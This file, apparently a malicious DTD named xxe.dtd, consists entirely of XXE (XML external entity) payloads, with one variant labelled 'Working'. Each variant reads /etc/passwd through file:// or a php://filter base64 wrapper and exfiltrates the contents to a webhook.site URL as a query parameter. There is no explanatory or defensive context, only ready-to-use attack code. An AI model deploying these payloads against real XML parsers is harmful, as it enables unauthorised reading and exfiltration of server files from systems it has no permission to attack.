xxe.dtd

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?data=%file;'>">
%xxe;

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#37; exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b?x=%file;'>">
%eval;
%exfil;

Working

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?%file;'>">
%xxe;